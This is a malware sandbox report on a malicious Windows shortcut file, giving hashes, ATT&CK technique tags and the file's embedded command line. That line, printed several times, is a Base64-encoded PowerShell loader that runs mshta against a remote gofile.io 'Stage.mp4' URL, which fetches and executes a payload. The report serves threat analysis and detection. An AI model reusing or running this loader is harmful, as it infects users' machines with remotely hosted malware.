Malicious
Malicious

3bf12a065c4bf9abfc4985443bc66915

LNK File
|
MD5: 3bf12a065c4bf9abfc4985443bc66915
|
Size: 3.09 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
3bf12a065c4bf9abfc4985443bc66915
Sha1
27ebd4c4e443da4683a2cb874f7edf67b6293c58
Sha256
de20b5640a5b340f67159be3c996930649bca93745946da26e76ffb3bd8c3fc0
Sha384
7af72d16a7950ed6705cf0473fd3d05136397b9d4cb2aa00fac3191f3019d8087baebdb2f2ed2a4bf238e0faceff6277
Sha512
c9bcbc832292414347ea5668462537f8f85de1197c55e6023ff5f5573a0b085be830e7e1415a2888e81e8b690b2b2037600b6d6d7a7c0067cbde5f7f6f936740
SSDeep
24:8Ayw/BHYVKVWf+/CW9Op19z4PSCvFu6jkyXCIyjH343Hsab/srsysh6FtmVdd792:8y5ayM3CvFu8/XEQVh6FtmVdJ9Aa
TLSH
A851202409F601FAF673CBB997F573F245A6FBE28C2496BC108067420762554E4A3E7A
File Structure
3bf12a065c4bf9abfc4985443bc66915
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
3bf12a065c4bf9abfc4985443bc66915 (3.09 KB)
File Structure
3bf12a065c4bf9abfc4985443bc66915
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Malicious

3bf12a065c4bf9abfc4985443bc66915
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="

Malicious

3bf12a065c4bf9abfc4985443bc66915 > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙